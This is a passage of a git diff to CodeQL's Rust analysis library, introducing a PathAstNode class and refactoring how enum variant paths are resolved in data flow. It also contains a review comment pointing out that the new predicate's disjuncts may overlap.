@@ -524,20 +527,20 @@ lib/codeql/rust/elements/internal/generated/PtrType.qll 40099c5a4041314b66932dfd lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll efd93730de217cf50dcba5875595263a5eadf9f7e4e1272401342a094d158614 229b251b3d118932e31e78ac4dfb75f48b766f240f20d436062785606d44467b -lib/codeql/rust/elements/internal/generated/Raw.qll b6bfb4c58f879143b78546b9a1f657876a245facdd01f7dd944825ca9dcf3464 867f32b72030b2b234f818e07b55abc3a3b516c91162dda736b8bc761c16afd6 -lib/codeql/rust/elements/internal/generated/RecordExpr.qll 57a25e78a1e501fa6e2876b8412056fb9a50fed79645542e420789333049335e 5f3692fe36d3590ddbb4b6228adf17528a0ab91057940bd9faac000ae735bec1 +lib/codeql/rust/elements/internal/generated/Raw.qll aa46ac03eea469d7f8ea52c1b9d1f266870c3a1bcd034a9efcf3becef984d8f7 36bcd61f69be5a713d151f3583cca20ea92e3e8e09343c7ddebb618f6de8649f +lib/codeql/rust/elements/internal/generated/RecordExpr.qll 2131b2cb336caa76170082e69776011bf02576bbfdd34ba68ca84af24209250a 39a2e3ec32352b594c43cc1295e0e8b3f9808173322d3d73cb7d48ef969d5565 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 lib/codeql/rust/elements/internal/generated/RecordField.qll 9f7840e1a2a194d5ed1d5201ab483eb01129849d49392581e0328bbc0934305c 
0e019b5b8fe91bc96c7c07933c766d8a09c066d48ed96f24ae3dad303c00585e lib/codeql/rust/elements/internal/generated/RecordFieldList.qll d7bb2677338cf420b0d6371aeec781aacc2272c73413ea96b7418177ad149fb9 5ef52074b9f4ec31e7422b70efdb2e650d673b2625efdfec18a4e48c30e35cf6 -lib/codeql/rust/elements/internal/generated/RecordPat.qll 0431a89f30da9dff98b850998d58fcf4d7b475f503e9a9eddf3576965514d22a eb06e4b716f6bc4aed962d609a08679a336cfd375fbd34b2c9fce3f4642ed385 +lib/codeql/rust/elements/internal/generated/RecordPat.qll 32a495778fc479d597cb722742a3b8821c4af45944773a055e6be0660d93daca 539b1af822c3f20ce093a03152b18047e9cbad1a55014d6e5e4d8bf27d260196 lib/codeql/rust/elements/internal/generated/RecordPatField.qll f17b1aa265091fd8309fd90d5c3822d170870e304f160225327de5a844a9aed4 0458e39dbe88060b4b664692cf0b41ebf4364de268d9417658c14c883c9c1b33 lib/codeql/rust/elements/internal/generated/RecordPatFieldList.qll 08d4740bbb519f15ab20b694b3c45e396a2a59cce0f68fa4b9698348784cae43 99919809607ae61c707f591ee609c50bcfb90d5b4f9c263f6b8e78658d21b605 lib/codeql/rust/elements/internal/generated/RefExpr.qll 7d995884e3dc1c25fc719f5d7253179344d63650e217e9ff6530285fe7a57f64 f2c3c12551deea4964b66553fb9b6423ee16fec53bd63db4796191aa60dc6c66 lib/codeql/rust/elements/internal/generated/RefPat.qll 5c4d908f851d89f42cf765007c46ac4199200f9b997f368d5b0e2a435efa82cd 42fd637bc98b5a9275386f1c5fb3ae8c4681987289a89b060991416a25131306 lib/codeql/rust/elements/internal/generated/RefType.qll 3603a3e000acc25c5e675bd4bc4a5551b8f63851591e1e9247709e48d1769dc5 91bea4a1d5ef0779d575567253cd007157d3982524e63a7c49c5cae85cb42e5f lib/codeql/rust/elements/internal/generated/Rename.qll d23f999dab4863f9412e142756f956d79867a3579bd077c56993bdde0a5ac2f1 9256c487d3614bf3d22faa294314f490cf312ab526b8de0882e3a4a371434931 -lib/codeql/rust/elements/internal/generated/Resolvable.qll 5579fbd90b106c36828b713b6344c5547d3e449078702efa43b21400f69a1aa8 6ad7f9a0285eb4c69c62de7f23ac1da517f3d468407547685d6607d90fd30641 
+lib/codeql/rust/elements/internal/generated/Resolvable.qll 586eefb01794220679c3b5d69c059d50c2238cf78ab33efe7185bbd07dea8dbd 1b7c7297d541b9de9e881d18fed4ae40dd327396366a3a6f52a24b85685fa9c1 lib/codeql/rust/elements/internal/generated/RestPat.qll b3a4206e68cf67a0310a466721e7c4b3ab855e65490d589d3d856ad333b3d5e8 30b471bec377784f61d73ef93e74fc0dcec7f512ac4b8791d1ca65f2bcea14b8 lib/codeql/rust/elements/internal/generated/RetType.qll a26860cd526b339b9527c089d126c5486e678dd080e88c60ea2fe641e7d661fd a83c1ce32fd043945ad455b892a60c2a9b6a62d7a5aadf121c4b4056d1dfb094 lib/codeql/rust/elements/internal/generated/ReturnExpr.qll c9c05400d326cd8e0da11c3bfa524daa08b2579ecaee80e468076e5dd7911d56 e7694926727220f46a7617b6ca336767450e359c6fa3782e82b1e21d85d37268 
@@ -550,7 +553,7 @@ lib/codeql/rust/elements/internal/generated/Static.qll 5fbd6879858cf356d4bdaa6da lib/codeql/rust/elements/internal/generated/Stmt.qll 8473ff532dd5cc9d7decaddcd174b94d610f6ca0aec8e473cc051dad9f3db917 6ef7d2b5237c2dbdcacbf7d8b39109d4dc100229f2b28b5c9e3e4fbf673ba72b lib/codeql/rust/elements/internal/generated/StmtList.qll a667193e32341e17400867c6e359878c4e645ef9f5f4d97676afc0283a33a026 a320ed678ee359302e2fc1b70a9476705cd616fcfa44a499d32f0c7715627f73 lib/codeql/rust/elements/internal/generated/Struct.qll 4d57f0db12dc7ad3e31e750a24172ef1505406b4dab16386af0674bd18bf8f4b 1a73c83df926b996f629316f74c61ea775be04532ab61b56af904223354f033e -lib/codeql/rust/elements/internal/generated/Synth.qll 1aeee823f44fe6ee94ca8dcace6b6cae952be9fe3f50b4c500a392d01139f322 2cdd764b8c508e8a8288368fc8ac729c4469f08304711960de6ef9ec72434942 +lib/codeql/rust/elements/internal/generated/Synth.qll b635676938a62e67c8c0db6eb21c6d2cbce0d9d3d429f91f8f85bd79c0c4d7c0 444e2bb62325bd1dc1d3a3e9c2b8ae161f0eb70659cf809ce069eb6886417bc4 lib/codeql/rust/elements/internal/generated/SynthConstructors.qll e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f lib/codeql/rust/elements/internal/generated/Token.qll 77a91a25ca5669703cf3a4353b591cef4d72caa6b0b9db07bb9e005d69c848d1 2fdffc4882ed3a6ca9ac6d1fb5f1ac5a471ca703e2ffdc642885fa558d6e373b lib/codeql/rust/elements/internal/generated/TokenTree.qll 8577c2b097c1be2f0f7daa5acfcf146f78674a424d99563e08a84dd3e6d91b46 d2f30764e84dbfc0a6a5d3d8a5f935cd432413688cb32da9c94e420fbc10665c 
@@ -561,7 +564,7 @@ lib/codeql/rust/elements/internal/generated/TupleExpr.qll 75186da7c077287b9a86fc lib/codeql/rust/elements/internal/generated/TupleField.qll d2580e046a576a1a7669463956c929912e383de304854a86eea5e45807a0a882 b41cbc48fcbb56543705e6bf708b72156307c71735d2ed42b97d8bf3c1099dd1 lib/codeql/rust/elements/internal/generated/TupleFieldList.qll 9d4981d04c2ee005e41035b9699f03bff270c4e0515af5482d02e614a0b1a875 4e60b857fbcb668fa1a001e0eff03f1aa3a7465d32ce68e23544b705fa54fc5d lib/codeql/rust/elements/internal/generated/TuplePat.qll d61163a380f3f2c1709080e2df69a90764509af060e607e27e832862e4dae18c 108b7db493a21fe1fa0db99fceee952aabb0a128eac41e050877ab9136407403 -lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 987745c3c58df38a41f14fce1b59ee82859de7706680f23e52010937fc4646ee 91446a75fd63af87566ff347a7c25c3f6c9cbd75c0d72bdc99590a1af27e8ef4 +lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 3864e3b88a23558397a885cd8caca25aa5e8a9e9e372b688d357bb8fe38ee3b8 1889e0ea07cfb9ad7347510906b5abf14374d1306dece1606ebc228b19bf0ad2 lib/codeql/rust/elements/internal/generated/TupleType.qll 7fae8e881157a24c4ce4f960269ba8010e227a81d3055b571f861f7196f868e2 18085a19a102df8e2cded938b49709225e89f0ce68b4a003310647bb259a6bd3 lib/codeql/rust/elements/internal/generated/TypeAlias.qll af02bb172b6f2d7f5eab8645a5a219eee8a4bbc445838f5739f18ba217c7e608 6d871471d673adae99c8b146f6f7ab204f24d52b5013b4582037a42b279c9f05 lib/codeql/rust/elements/internal/generated/TypeArg.qll fe4441b3faa44e542c43a85353347df23d3f74da0c4b17cb0fdc60f5aca9dee7 1473d044e979e7cb6628525ffd454549cd8a37560488c695f534243946cf83bc 
@@ -585,7 +588,7 @@ lib/codeql/rust/elements/internal/generated/WhileExpr.qll 7edf1f23fbf953a2baabcd lib/codeql/rust/elements/internal/generated/WildcardPat.qll d74b70b57a0a66bfae017a329352a5b27a6b9e73dd5521d627f680e810c6c59e 4b913b548ba27ff3c82fcd32cf996ff329cb57d176d3bebd0fcef394486ea499 lib/codeql/rust/elements/internal/generated/YeetExpr.qll cac328200872a35337b4bcb15c851afb4743f82c080f9738d295571eb01d7392 94af734eea08129b587fed849b643e7572800e8330c0b57d727d41abda47930b lib/codeql/rust/elements/internal/generated/YieldExpr.qll 37e5f0c1e373a22bbc53d8b7f2c0e1f476e5be5080b8437c5e964f4e83fad79a 4a9a68643401637bf48e5c2b2f74a6bf0ddcb4ff76f6bffb61d436b685621e85 -lib/codeql/rust/elements.qll ced76fbeebc6e2e972ecaed65ef97851f90a215cf330f28a0f31a253f1c03442 ced76fbeebc6e2e972ecaed65ef97851f90a215cf330f28a0f31a253f1c03442 +lib/codeql/rust/elements.qll ba73bcb718837cc3d9d6f283609a869dc48b7848109e07496d5f52723dc2e62c ba73bcb718837cc3d9d6f283609a869dc48b7848109e07496d5f52723dc2e62c test/extractor-tests/generated/Abi/Abi.ql 7f6e7dc4af86eca3ebdc79b10373988cd0871bd78b51997d3cffd969105e5fdd 2f936b6ca005c6157c755121584410c03e4a3949c23bee302fbe05ee10ce118f test/extractor-tests/generated/Abi/Abi_getAbiString.ql a496762fcec5a0887b87023bbf93e9b650f02e20113e25c44d6e4281ae8f5335 14109c7ce11ba25e3cd6e7f1b3fcb4cb00622f2a4eac91bfe43145c5f366bc52 test/extractor-tests/generated/ArgList/ArgList.ql e412927756e72165d0e7c5c9bd3fca89d08197bbf760db8fb7683c64bb2229bc 043dba8506946fbb87753e22c387987d7eded6ddb963aa067f9e60ef9024d684 
@@ -725,9 +728,7 @@ test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getFormat.ql 02d3fa test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getTemplate.ql c912ac37275cbe7b3b29607bed1a3190c80779436422c14a475113e1bfd91a54 ef90f67a9b952a38ce557b1afbf0b5ce8551e83ddfaad8309a0c9523e40b5ea7 test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql 7a7ee3a3322b4af8cb3b525cfed8cc9719d136ea80aa6b3fb30c7e16394dd93f 5aa8a77d7741b02f8ceb9e5991efa4c2c43c6f1624989218990e985108dae535 test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql 7bd4ec3dde2ef0463585794101e6cc426c368b0e4ab95fbb1f24f8f0a76cf471 e7b01e8b21df5b22c51643e2c909c6fc4ca96fda41b3290c907ba228abe8669b -test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql f1b727be65d0563c8dffab61248a1b9a59b221fdaae28d3a3fbde3fb17592f5b dbf2395213d261bcf01c3258ab51f073e7934d58af5e2044b64292ed8f71f9a4 -test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql f7288c9be7b31a6c78da9e2f4e774522013c2db8ff457dfb5edced009b65ebdd 58ea795ccf649f733c995c49da4680f68599d58f466cb63415a12f4cc9d0ab11 -test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql 56a0347a705b5719a97f520b2c0777c97e73bc2d977dc5d00910679950eae5ca 1ef63883dd83a22f56f226348e8fb9bf72817df19ff2708a4559a5f7b8a2855a +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql 2793ba1ff52182dab992d82d3767a000928f6b2fbfdb621349cafc183f0d2480 c3777d03214f7feb9020de3ce45af6556129e39e9b30d083de605b70ab9a0a12 test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql 26d592398a17795427b5b6b51ff4a013ee15c31443e732a000baca5f2e65acca 7940a864b84b89e84d7fb186599cb8b6bcbead7141c592b8ab0c59fcd380d5fb test/extractor-tests/generated/Function/Function.ql c1c2a9b68c35f839ccd2b5e62e87d1acd94dcc2a3dc4c307c269b84b2a0806e6 1c446f19d2f81dd139aa5a1578d1b165e13bddbaeab8cfee8f0430bced3a99ab 
test/extractor-tests/generated/Function/Function_getAbi.ql e5c9c97de036ddd51cae5d99d41847c35c6b2eabbbd145f4467cb501edc606d8 0b81511528bd0ef9e63b19edfc3cb638d8af43eb87d018fad69d6ef8f8221454 @@ -897,7 +898,7 @@ test/extractor-tests/generated/ParenPat/ParenPat_getPat.ql 96f3db0ec4e71fd870619 test/extractor-tests/generated/ParenType/ParenType.ql 81c8ad667397ce36157941abd9b879e9305a440018853af4528eb737ae4d2935 3ef3b86203b0143be2d7f7f4833f55fd6c226cb9205e3c1940b6c2a1371622f3 test/extractor-tests/generated/ParenType/ParenType_getTy.ql 41dd6605e7b348618156712b559e2f1b6aac02d6c727e8cbf8653530794ec969 30ac6611c730e76cfb75f98efcf817783a50cec0cf3b3197459d7642f74dde85 test/extractor-tests/generated/Path/Path.ql 2bdcd99b3b5ffc83ac47d8cc27a4561d616bcf06844f0c452c699cd10ee640ca 5a7d7ffb8b0c04d6a8cbb2a953761df8561b796c4372bef1bd55c359b2f19911 -test/extractor-tests/generated/Path/PathExpr.ql 7716664d4f2254456df9d0f44836e761df60c96133d484cbda39e6cbb3152610 4ee3dd2b9fb1f223de0151db71cb623e93dea9afec125222f91e2bc02173173d +test/extractor-tests/generated/Path/PathExpr.ql 5039fe730998a561f51813a0716e18c7c1d36b6da89936e4cfbdb4ef0e895560 cd3ddf8ab93cd573381807f59cded7fb3206f1dbdff582490be6f23bed2d6f29 test/extractor-tests/generated/Path/PathExpr_getAttr.ql 2ccac48cd91d86670c1d2742de20344135d424e6f0e3dafcc059555046f92d92 9b7b5f5f9e3674fad9b3a5bcd3cabc0dff32a95640da0fce6f4d0eb931f1757d test/extractor-tests/generated/Path/PathExpr_getPath.ql e7894071313a74166bdd31d7cd974037fcd5a7f0e92d5eec42833266196eb858 46a06e8a1207e7a0fa175cd4b61068e5fd6c43b5575b88986409f0ac2be64c51 test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql a68a1f0d865d10c955f7ab1fd7614b517e660553b65fabb9daa8f302adbc2602 c47480d6440ae63be27d8158a35536a8d9051817dec1521cdcab297ddb52e1ae 
@@ -1053,7 +1054,7 @@ test/extractor-tests/generated/TupleFieldList/TupleFieldList.ql 7dc88440222ff036 test/extractor-tests/generated/TupleFieldList/TupleFieldList_getField.ql ad552a9c0b9964d1770f14cabbb436db60ebedc3c569006542a8eae9ddb30f6d 3a8c49d629376a9b8326138836b05ee2366b1021ffd19f5be74ab023e70aa50d test/extractor-tests/generated/TuplePat/TuplePat.ql 24ee56bc848537da65eb8ecef71e84cc351a2aedcc31d6fb53a5b7865f15f7c2 81db1076e2e4921ceb50933b96cd7b574caab1818de257c1e9038f3f97447d59 test/extractor-tests/generated/TuplePat/TuplePat_getField.ql f000bed41af031bc56d0705ce312abe7ab3dc6745b2936798c9938781e51475e f464a84dbc36aa371d60d6db68d6251f6b275dc4ecebdc56f195637be390b067 -test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 194b2fbfc83a84caf76032f3c63a1f7e618f71e5ea5be449e9d2691b0fce9829 0ff24488ba5729591ce86a702fdfb6f4e0498f96d89bf5c4bd05bd90523f9435 +test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 967409c7bddd7fc8d0b9fdfab2f5e6c82e8b4ff57020822aa0cda177244dfbc5 eaf0b7e56c38db60fafb39f8de75b67ee1099ac540fa92b5dfe84b601d31781a test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql f3f2e23cc2a32aa5abc1e0fda1300dab1693230632b9eaa75bb3b1e82ee9ea1a 24b87a39ec639a26ff8c1d04dc3429b72266b2a3b1650a06a7cd4387b6f0e615 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql 13a06696bbf1fa8d5b73107e28cdba40e93da04b27f9c54381b78a52368d2ad1 5558c35ea9bb371ad90a5b374d7530dd1936f83e6ba656ebfbfd5bd63598e088 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql e409667233331a038e482de4b2669d9fac9d7eb0e3bd5580ea19828f0c4ed7ad 588e4628471f1004575900d7365490efcf9168b555ff26becfc3f27b9e657de3 diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 973f32e7d9b..68cfe403c89 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes 
@@ -104,6 +104,7 @@ /lib/codeql/rust/elements/ParenType.qll linguist-generated /lib/codeql/rust/elements/Pat.qll linguist-generated /lib/codeql/rust/elements/Path.qll linguist-generated +/lib/codeql/rust/elements/PathAstNode.qll linguist-generated /lib/codeql/rust/elements/PathExpr.qll linguist-generated /lib/codeql/rust/elements/PathExprBase.qll linguist-generated /lib/codeql/rust/elements/PathPat.qll linguist-generated @@ -303,6 +304,7 @@ /lib/codeql/rust/elements/internal/ParenPatConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/ParenTypeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/PatImpl.qll linguist-generated +/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll linguist-generated /lib/codeql/rust/elements/internal/PathConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/PathExprBaseImpl.qll linguist-generated /lib/codeql/rust/elements/internal/PathExprConstructor.qll linguist-generated @@ -516,6 +518,7 @@ /lib/codeql/rust/elements/internal/generated/ParentChild.qll linguist-generated /lib/codeql/rust/elements/internal/generated/Pat.qll linguist-generated /lib/codeql/rust/elements/internal/generated/Path.qll linguist-generated +/lib/codeql/rust/elements/internal/generated/PathAstNode.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathExpr.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathExprBase.qll linguist-generated /lib/codeql/rust/elements/internal/generated/PathPat.qll linguist-generated 
@@ -728,8 +731,6 @@ /test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql linguist-generated -/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql linguist-generated -/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql linguist-generated /test/extractor-tests/generated/Function/Function.ql linguist-generated /test/extractor-tests/generated/Function/Function_getAbi.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll index 1c3afbc83b0..fd5bdf320d3 100644 --- a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll +++ b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll @@ -2060,16 +2060,6 @@ module MakeCfgNodes Input> { * Gets the number of attrs of this path expression. */ int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } - - /** - * Gets the path of this path expression, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentPathExprBase extends ParentAstNode, PathExprBase { @@ -2108,16 +2098,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `PathPat`. */ PathPat getPathPat() { result = node } - - /** - * Gets the path of this path pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentPrefixExpr extends ParentAstNode, PrefixExpr { 
@@ -2345,16 +2325,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `RecordExpr`. */ RecordExpr getRecordExpr() { result = node } - /** - * Gets the path of this record expression, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } - /** * Gets the record expression field list of this record expression, if it exists. */ @@ -2387,16 +2357,6 @@ module MakeCfgNodes Input> { /** Gets the underlying `RecordPat`. */ RecordPat getRecordPat() { result = node } - /** - * Gets the path of this record pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } - /** * Gets the record pat field list of this record pat, if it exists. */ @@ -2889,16 +2849,6 @@ module MakeCfgNodes Input> { * Gets the number of fields of this tuple struct pat. */ int getNumberOfFields() { result = count(int i | exists(this.getField(i))) } - - /** - * Gets the path of this tuple struct pat, if it exists. - */ - Path getPath() { result = node.getPath() } - - /** - * Holds if `getPath()` exists. - */ - predicate hasPath() { exists(this.getPath()) } } final private class ParentUnderscoreExpr extends ParentAstNode, UnderscoreExpr { diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index 4de9842d54f..2103579291b 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll 
@@ -598,31 +598,33 @@ module RustDataFlow implements InputSig { predicate jumpStep(Node node1, Node node2) { none() } /** Holds if path `p` resolves to variant `v`. */ - private predicate pathResolveToVariantCanonicalPath(Path p, VariantCanonicalPath v) { - exists(CrateOriginOption crate, string path | - resolveExtendedCanonicalPath(p.getQualifier(), crate, path) and - v = MkVariantCanonicalPath(crate, path, p.getPart().getNameRef().getText()) + private predicate pathResolveToVariantCanonicalPath(PathAstNode p, VariantCanonicalPath v) { + exists(CrateOriginOption crate, string path, string name | + // TODO: this is bad, but will be solved by moving to semantic paths away from strings + resolveExtendedCanonicalPath(p, crate, path + "::" + name) and + v = MkVariantCanonicalPath(crate, path, name) ) or // TODO: Remove once library types are extracted - not p.hasQualifier() and - v = MkVariantCanonicalPath(_, "crate::std::option::Option", p.getPart().getNameRef().getText()) - or - // TODO: Remove once library types are extracted - not p.hasQualifier() and - v = MkVariantCanonicalPath(_, "crate::std::result::Result", p.getPart().getNameRef().getText()) + exists(Path path | + path = p.getPath() and + not path.hasQualifier() and + v = + MkVariantCanonicalPath(_, ["crate::std::option::Option", "crate::std::result::Result"], + path.getPart().getNameRef().getText()) + ) } /** Holds if `p` destructs an enum variant `v`. */ pragma[nomagic] private predicate tupleVariantDestruction(TupleStructPat p, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(p.getPath(), v) + pathResolveToVariantCanonicalPath(p, v) } /** Holds if `p` destructs an enum variant `v`. */ pragma[nomagic] private predicate recordVariantDestruction(RecordPat p, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(p.getPath(), v) + pathResolveToVariantCanonicalPath(p, v) } /** 
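Review bot: The two disjuncts of `pathResolveToVariantCanonicalPath` are no longer mutually exclusive, so a single path node can map to two variants. The old first disjunct resolved `p.getQualifier()` and so only held for qualified paths, while the new one resolves `p` itself and can presumably also hold for an unqualified path, which the `Option`/`Result` fallback then matches again by name alone. An unqualified `Some`/`Ok`/`Err` that resolves to a user-defined enum would then also be treated as the std variant, which would make the content flow built on `tupleVariantDestruction`, `recordVariantDestruction` and the two construction predicates in the next hunk imprecise. Guarding the fallback with `not resolveExtendedCanonicalPath(p, _, _) and` inside the `exists(Path path | …)` would restore the exclusivity. The QLdoc should also follow the new parameter type, for example `/** Holds if the path wrapped by `p` resolves to variant `v`. */`.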
@@ -651,13 +653,13 @@ module RustDataFlow implements InputSig { /** Holds if `ce` constructs an enum value of type `v`. */ pragma[nomagic] private predicate tupleVariantConstruction(CallExpr ce, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(ce.getFunction().(PathExpr).getPath(), v) + pathResolveToVariantCanonicalPath(ce.getFunction().(PathExpr), v) } /** Holds if `re` constructs an enum value of type `v`. */ pragma[nomagic] private predicate recordVariantConstruction(RecordExpr re, VariantCanonicalPath v) { - pathResolveToVariantCanonicalPath(re.getPath(), v) + pathResolveToVariantCanonicalPath(re, v) } /** diff --git a/rust/ql/lib/codeql/rust/elements.qll b/rust/ql/lib/codeql/rust/elements.qll index e37dde90d61..dba1e446054 100644 --- a/rust/ql/lib/codeql/rust/elements.qll +++ b/rust/ql/lib/codeql/rust/elements.qll @@ -106,6 +106,7 @@ import codeql.rust.elements.ParenPat import codeql.rust.elements.ParenType import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.PathExpr import codeql.rust.elements.PathExprBase import codeql.rust.elements.PathPat diff --git a/rust/ql/lib/codeql/rust/elements/PathAstNode.qll b/rust/ql/lib/codeql/rust/elements/PathAstNode.qll new file mode 100644 index 00000000000..c8ff02e634c --- /dev/null +++ b/rust/ql/lib/codeql/rust/elements/PathAstNode.qll @@ -0,0 +1,13 @@ +// generated by codegen, do not edit +/** + * This module provides the public class `PathAstNode`. + */ + +private import internal.PathAstNodeImpl +import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable + +/** + * An AST element wrapping a path (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`). + */ +final class PathAstNode = Impl::PathAstNode; diff --git a/rust/ql/lib/codeql/rust/elements/PathExpr.qll b/rust/ql/lib/codeql/rust/elements/PathExpr.qll index e1bf10488e3..5c768530e21 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExpr.qll 
+++ b/rust/ql/lib/codeql/rust/elements/PathExpr.qll @@ -5,7 +5,7 @@ private import internal.PathExprImpl import codeql.rust.elements.Attr -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.PathExprBase /** diff --git a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll index 95fd48d6386..e2e45e718f0 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll @@ -5,7 +5,6 @@ private import internal.PathExprBaseImpl import codeql.rust.elements.Expr -import codeql.rust.elements.Resolvable /** * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. diff --git a/rust/ql/lib/codeql/rust/elements/PathPat.qll b/rust/ql/lib/codeql/rust/elements/PathPat.qll index 2c360a2b858..ae61b5e93e8 100644 --- a/rust/ql/lib/codeql/rust/elements/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/PathPat.qll @@ -5,8 +5,7 @@ private import internal.PathPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path -import codeql.rust.elements.Resolvable +import codeql.rust.elements.PathAstNode /** * A path pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll index c993059e977..3429ff3597e 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll @@ -5,9 +5,8 @@ private import internal.RecordExprImpl import codeql.rust.elements.Expr -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.RecordExprFieldList -import codeql.rust.elements.Resolvable /** * A record expression. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/RecordPat.qll index fb37a42659b..242b7398696 100644 
--- a/rust/ql/lib/codeql/rust/elements/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordPat.qll @@ -5,9 +5,8 @@ private import internal.RecordPatImpl import codeql.rust.elements.Pat -import codeql.rust.elements.Path +import codeql.rust.elements.PathAstNode import codeql.rust.elements.RecordPatFieldList -import codeql.rust.elements.Resolvable /** * A record pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/Resolvable.qll index 200809dd852..6a2304a3be7 100644 --- a/rust/ql/lib/codeql/rust/elements/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/Resolvable.qll @@ -7,6 +7,6 @@ private import internal.ResolvableImpl import codeql.rust.elements.AstNode /** - * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. + * One of `PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`. */ final class Resolvable = Impl::Resolvable; diff --git a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll 